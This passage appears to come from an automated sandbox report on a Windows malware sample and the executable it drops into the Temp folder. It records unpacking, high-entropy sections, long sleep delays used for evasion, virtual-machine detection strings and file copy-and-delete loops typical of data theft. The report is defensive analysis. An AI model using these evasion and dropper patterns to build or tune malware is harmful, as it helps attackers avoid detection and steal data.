                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeUnpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\ief722WreR.exeUnpacked PE file: 0.2.ief722WreR.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeUnpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AFF010 push ecx; ret 0_2_00AFF02D
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AFC3E4 pushad ; ret 0_2_00AFC40C
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AFC885 push 00000003h; ret 0_2_00AFC889
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AFAADA push es; iretd 0_2_00AFAAEB
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AFEE92 pushad ; ret 0_2_00AFEEAE
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024909CD push ecx; ret 0_2_024909E0
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B799F push esp; retf 0_2_024B79A7
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0249CE18 push ss; retf 0_2_0249CE1D
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0248FFF3 push ecx; ret 0_2_02490006
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B7F9D push esp; retf 0_2_024B7F9E
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024BDDDE push dword ptr [esp+ecx-75h]; iretd 0_2_024BDDE2
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B9DE8 pushad ; retf 0_2_024B9DEF
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F7B2C push ecx; ret 8_2_009F7B3F
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5DCFD push edx; iretd 8_2_00A5DD0E
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5C2FF push B35707CFh; iretd 8_2_00A5C3F3
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5C2FF pushad ; iretd 8_2_00A5C471
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5EAFA pushad ; retf 8_2_00A5EAFB
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5D206 push ebp; iretd 8_2_00A5D239
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5B380 push 00000032h; retf 8_2_00A5B382
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5C3F4 pushad ; iretd 8_2_00A5C471
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5EB3C push ebx; iretd 8_2_00A5EB67
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_00A5A360 push ebx; ret 8_2_00A5A3C5
                    Source: ief722WreR.exeStatic PE information: section name: .text entropy: 7.553001973414483
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.107648496385774
                    Source: DADE.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.107648496385774
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                    Source: C:\Users\user\Desktop\ief722WreR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeWindow / User API: threadDelayed 2932Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeWindow / User API: threadDelayed 7043Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_8-32722
                    Source: C:\Users\user\Desktop\ief722WreR.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65497
                    Source: C:\Users\user\Desktop\ief722WreR.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeAPI coverage: 3.2 %
                    Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996Thread sleep count: 2932 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996Thread sleep time: -2116904s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996Thread sleep count: 7043 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996Thread sleep time: -5085046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\ief722WreR.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B8C59 FindFirstFileExW,0_2_024B8C59
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009EE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,8_2_009EE0B7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009ED8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009ED8A7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009D1807
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E1827
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009D1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,8_2_009D1820
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009EE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009EE597
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E5127
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009E1EA7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009DDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009DDFD7
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009E3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,8_2_009E3F27
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009ECF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,8_2_009ECF47
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F33F7 GetSystemInfo,wsprintfA,8_2_009F33F7
                    Source: Amcache.hve.13.drBinary or memory string: VMware
                    Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: DADE.tmp.exe, 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware;
                    Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676289540.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                    Source: ief722WreR.exe, 00000000.00000003.3546343202.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
